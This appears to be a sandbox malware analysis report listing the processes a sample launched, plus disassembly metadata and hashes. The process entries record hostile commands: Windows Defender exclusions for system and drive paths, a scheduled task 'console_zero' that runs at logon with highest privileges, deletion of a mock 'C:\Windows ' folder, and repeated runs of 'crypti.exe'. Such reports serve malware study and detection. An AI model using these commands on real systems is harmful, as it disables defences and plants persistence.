                                                                                          Target ID:50
                                                                                          Start time:06:41:45
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:51
                                                                                          Start time:06:41:46
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
                                                                                          Imagebase:0x7ff6e3d50000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:52
                                                                                          Start time:06:41:46
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:53
                                                                                          Start time:06:41:46
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:54
                                                                                          Start time:06:41:46
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\timeout.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:timeout /t 10 /nobreak
                                                                                          Imagebase:0x7ff790ae0000
                                                                                          File size:32'768 bytes
                                                                                          MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:55
                                                                                          Start time:06:41:46
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:56
                                                                                          Start time:06:41:46
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:57
                                                                                          Start time:06:41:46
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                          Imagebase:0x7ff78f510000
                                                                                          File size:235'008 bytes
                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:58
                                                                                          Start time:06:41:47
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\console_zero.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\System32\console_zero.exe
                                                                                          Imagebase:0x7ff71fa00000
                                                                                          File size:477'696 bytes
                                                                                          MD5 hash:74CF33F8C2FCB56F749AAF411B9AE302
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:59
                                                                                          Start time:06:41:48
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c schtasks /delete /tn "console_zero" /f
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:60
                                                                                          Start time:06:41:48
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7403e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:61
                                                                                          Start time:06:41:48
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:schtasks /delete /tn "console_zero" /f
                                                                                          Imagebase:0x7ff78f510000
                                                                                          File size:235'008 bytes
                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:62
                                                                                          Start time:06:41:49
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:63
                                                                                          Start time:06:41:49
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:64
                                                                                          Start time:06:41:49
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:powershell -Command Add-MpPreference -ExclusionPath 'E:\'
                                                                                          Imagebase:0xa30000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:65
                                                                                          Start time:06:41:49
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:66
                                                                                          Start time:06:41:49
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:68
                                                                                          Start time:06:41:49
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\schtasks.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                          Imagebase:0x7ff78f510000
                                                                                          File size:235'008 bytes
                                                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:69
                                                                                          Start time:06:41:52
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:70
                                                                                          Start time:06:41:52
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:71
                                                                                          Start time:06:41:52
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:powershell -Command Add-MpPreference -ExclusionPath 'F:\'
                                                                                          Imagebase:0x7ff6e3d50000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:74
                                                                                          Start time:06:42:19
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:75
                                                                                          Start time:06:42:19
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:76
                                                                                          Start time:06:42:19
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\crypti.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"c:\windows\system32\crypti.exe"
                                                                                          Imagebase:0x7ff60cc80000
                                                                                          File size:643'072 bytes
                                                                                          MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:81
                                                                                          Start time:06:42:30
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:82
                                                                                          Start time:06:42:31
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:83
                                                                                          Start time:06:42:31
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\crypti.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"c:\windows\system32\crypti.exe"
                                                                                          Imagebase:0x7ff7d6eb0000
                                                                                          File size:643'072 bytes
                                                                                          MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:84
                                                                                          Start time:06:42:43
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:85
                                                                                          Start time:06:42:43
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:86
                                                                                          Start time:06:42:43
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\crypti.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"c:\windows\system32\crypti.exe"
                                                                                          Imagebase:0x7ff7a51c0000
                                                                                          File size:643'072 bytes
                                                                                          MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:88
                                                                                          Start time:06:42:56
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:89
                                                                                          Start time:06:42:56
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:90
                                                                                          Start time:06:42:56
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\crypti.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"c:\windows\system32\crypti.exe"
                                                                                          Imagebase:0x7ff670930000
                                                                                          File size:643'072 bytes
                                                                                          MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:91
                                                                                          Start time:06:43:07
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c start "" "c:\windows\system32\crypti.exe"
                                                                                          Imagebase:0x7ff7d3130000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:92
                                                                                          Start time:06:43:07
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:93
                                                                                          Start time:06:43:07
                                                                                          Start date:18/12/2024
                                                                                          Path:C:\Windows\System32\crypti.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"c:\windows\system32\crypti.exe"
                                                                                          Imagebase:0x7ff77ee70000
                                                                                          File size:643'072 bytes
                                                                                          MD5 hash:D8C562EEBC88199B8D0E7274782C531D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Has exited:true

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Non-executed Functions

                                                                                            Function 00007FF668343EF0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2380118265.00007FF668321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF668320000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2380098241.00007FF668320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2385249072.00007FF669195000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2385294712.00007FF669198000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_7ff668320000_pyld611114.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                            • String ID:
                                                                                            • API String ID: 2933794660-0
                                                                                            • Opcode ID: 4c1b95cfeb29d36a2191ca800c4b776805e3dc359a3975e0c0840d805d58c9f8
                                                                                            • Instruction ID: 0b1857b68c40985531f14c1adb512e27c0571ee40951b8298e185759250633f4
                                                                                            • Opcode Fuzzy Hash: 4c1b95cfeb29d36a2191ca800c4b776805e3dc359a3975e0c0840d805d58c9f8
                                                                                            • Instruction Fuzzy Hash: 3C110632B14B058AEB008FB0E8552A833B4FB59758F480E35EE6D9A7A4DF78D1688240

                                                                                            Non-executed Functions

                                                                                            Function 00007FF792979BE4 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000C.00000002.2457592268.00007FF792961000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF792960000, based on PE: true
                                                                                            • Associated: 0000000C.00000002.2457510985.00007FF792960000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 0000000C.00000002.2457655887.00007FF793394000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 0000000C.00000002.2459654860.00007FF793760000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 0000000C.00000002.2459680036.00007FF793763000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_12_2_7ff792960000_usvcinsta64.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                            • String ID:
                                                                                            • API String ID: 2933794660-0
                                                                                            • Opcode ID: 708b7739343b0ed83ac0f76d64139286e1ea8fe78b9a00fa0674ff42a1f590b5
                                                                                            • Instruction ID: 866c1776324f9fdca93dc36fb4fa3defe7fa490696dae065aa37e331154e2075
                                                                                            • Opcode Fuzzy Hash: 708b7739343b0ed83ac0f76d64139286e1ea8fe78b9a00fa0674ff42a1f590b5
                                                                                            • Instruction Fuzzy Hash: FB119E26B08F0589FB50EF70E8542B873A8F728728F841E31DA6D927A8DF78D058C350

                                                                                            Execution Graph

                                                                                            Execution Coverage:34.4%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:34.2%
                                                                                            Total number of Nodes:73
                                                                                            Total number of Limit Nodes:2
                                                                                            execution_graph 234 7ff63f421789 235 7ff63f421798 _exit 234->235 236 7ff63f4217a1 234->236 235->236 237 7ff63f4217b6 236->237 238 7ff63f4217aa _cexit 236->238 238->237 187 7ff63f421570 GetStartupInfoW 188 7ff63f4215af 187->188 189 7ff63f4215c1 188->189 190 7ff63f4215ca Sleep 188->190 191 7ff63f4215e6 _amsg_exit 189->191 192 7ff63f4215f4 189->192 190->188 191->192 193 7ff63f421687 _IsNonwritableInCurrentImage 192->193 194 7ff63f42166a _initterm 192->194 200 7ff63f42164b 192->200 193->200 201 7ff63f4210e0 HeapSetInformation 193->201 194->193 197 7ff63f421748 exit 198 7ff63f421750 197->198 199 7ff63f421759 _cexit 198->199 198->200 199->200 202 7ff63f421d26 201->202 203 7ff63f42112c LoadCursorW GetStockObject RegisterClassW CreateWindowExW RegCreateKeyExW 202->203 204 7ff63f421219 RegQueryValueExW 203->204 205 7ff63f4212c4 GetLastError 203->205 206 7ff63f421252 204->206 207 7ff63f4212d0 LoadLibraryExW 205->207 208 7ff63f421267 RegDeleteValueW 206->208 209 7ff63f421258 206->209 210 7ff63f42127e RegSetValueExW 206->210 211 7ff63f4212fb GetProcAddress 207->211 212 7ff63f4212eb GetLastError 207->212 208->209 209->210 213 7ff63f4212b2 RegCloseKey 209->213 210->213 215 7ff63f421327 GetCommandLineW 211->215 216 7ff63f421319 GetLastError 211->216 214 7ff63f421361 RegOpenKeyExW 212->214 213->207 218 7ff63f4213f9 GetLastError 214->218 219 7ff63f421394 RegQueryValueExW RegCloseKey RegDeleteKeyExW 214->219 225 7ff63f421008 215->225 220 7ff63f421350 FreeLibrary 216->220 222 7ff63f421405 218->222 219->222 220->214 223 7ff63f421419 222->223 224 7ff63f42140a DestroyWindow 222->224 223->197 223->198 224->223 226 7ff63f4210ca 225->226 227 7ff63f421020 225->227 226->220 228 7ff63f421028 iswspace 227->228 230 7ff63f42103e 227->230 228->227 228->230 229 7ff63f421087 iswspace 229->230 231 7ff63f421051 229->231 230->226 230->229 230->231 231->226 232 7ff63f4210b4 iswspace 231->232 232->226 232->231 233 7ff63f421520 __wgetmainargs 239 7ff63f421d50 _XcptFilter 240 7ff63f421810 241 7ff63f421819 240->241 242 7ff63f421824 241->242 243 7ff63f421ba0 RtlCaptureContext RtlLookupFunctionEntry 241->243 244 7ff63f421c27 243->244 245 7ff63f421be5 RtlVirtualUnwind 243->245 248 7ff63f421b5c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 244->248 245->244 249 7ff63f421880 SetUnhandledExceptionFilter 250 7ff63f421840 251 7ff63f42184f 250->251 252 7ff63f421872 250->252 251->252 253 7ff63f42186b ?terminate@ 251->253 253->252 254 7ff63f421440 257 7ff63f421452 254->257 256 7ff63f4214b9 __set_app_type 258 7ff63f4214f6 256->258 261 7ff63f421908 GetModuleHandleW 257->261 259 7ff63f42150c 258->259 260 7ff63f4214ff __setusermatherr 258->260 260->259 262 7ff63f42191d 261->262 262->256 263 7ff63f4217e0 266 7ff63f421a54 263->266 267 7ff63f421a80 6 API calls 266->267 268 7ff63f4217e9 266->268 267->268

                                                                                            Callgraph

                                                                                            Executed Functions

                                                                                            Function 00007FF63F4210E0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 195registrylibrarymemoryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000001B.00000002.2552580244.00007FF63F421000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63F420000, based on PE: true
                                                                                            • Associated: 0000001B.00000002.2552554419.00007FF63F420000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.2552606972.00007FF63F422000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 0000001B.00000002.2552632237.00007FF63F424000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_27_2_7ff63f420000_printui.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastValue$CloseCreateDeleteLibraryLoadQueryWindow$AddressClassCommandCursorDestroyFreeHeapInformationLineObjectOpenProcRegisterStock
                                                                                            • String ID: PrintUIEntryW$Software\Microsoft\Windows\CurrentVersion\PrinterInstallation$StubPrintWindow$UIEntry$printui.dll
                                                                                            • API String ID: 2613610799-4035671587
                                                                                            • Opcode ID: e89becaa4b4c2da40ab99fedc63f44ed43bcaaa6e32622ee94d5cb7eade183ba
                                                                                            • Instruction ID: 08a0577a2ce127371488fd4a382e8509062a82fcb335b25226be4f052ff20d90
                                                                                            • Opcode Fuzzy Hash: e89becaa4b4c2da40ab99fedc63f44ed43bcaaa6e32622ee94d5cb7eade183ba
                                                                                            • Instruction Fuzzy Hash: 4CA14932A18A46DAFB148B60E4447BDBBA0FB89B89F825131DA0ED3B56CF3DD105D700
                                                                                            Function 00007FF63F421570 Relevance: 10.6, APIs: 7, Instructions: 143sleepCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
